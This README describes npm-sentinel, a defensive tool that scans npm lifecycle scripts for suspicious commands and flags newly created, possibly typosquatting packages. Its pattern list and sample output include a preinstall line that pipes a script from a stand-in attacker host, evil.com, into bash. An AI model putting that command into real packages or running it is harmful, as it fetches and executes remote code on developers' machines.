npm-sentinel

npm-sentinel is a professional-grade security tool designed to protect your development environment from supply chain attacks. By analyzing package.json lifecycle scripts and cross-referencing with the npm registry, it acts as an early warning system against malicious dependencies.

"In a world of compromised packages, be the sentinel."

Why npm-sentinel?

Supply chain attacks like Shai Hulud 2.0 are on the rise, leveraging malicious preinstall and postinstall scripts to steal credentials and compromise CI/CD pipelines. npm-sentinel helps you:

• Detect Malicious Scripts: Instantly flag suspicious commands (curl, wget, | bash, encoded payloads) before you install.
• Identify Typosquatting: Warns you about newly created packages that mimic popular libraries.
• Audit Dependencies: fast, offline-capable scanning of your local projects.

Installation

From Crates.io

cargo install npm_sentinel

From Source

git clone https://github.com/emorilebo/npm_sentinel.git
cd npm_sentinel
cargo build --release

Usage

npm-sentinel is designed for simplicity and speed.

Basic Scan

Analyze the current directory for threats:

npm-sentinel

Targeted Scan

Analyze a specific project or file:

npm-sentinel --path /path/to/project
npm-sentinel --path /path/to/package.json

Verbose Mode

Get detailed output about every lifecycle script found:

npm-sentinel --verbose

Example Output

npm-sentinel: Starting analysis...
Target: ./suspicious-package/package.json
Analyzing package: suspicious-lib
  [INFO] Lifecycle script found: 'preinstall'
  [WARNING] Suspicious pattern 'curl' found in script 'preinstall': curl http://evil.com | bash
Checking registry for 'suspicious-lib'...
  Package created: 2025-11-25T10:00:00.000Z (New package!)

Contributing

We welcome contributions! Please see our CONTRIBUTING.md (coming soon) or simply fork and submit a PR.

License

This project is licensed under the MIT License - see the LICENSE file for details.

Author

Godfrey Lebo - GitHub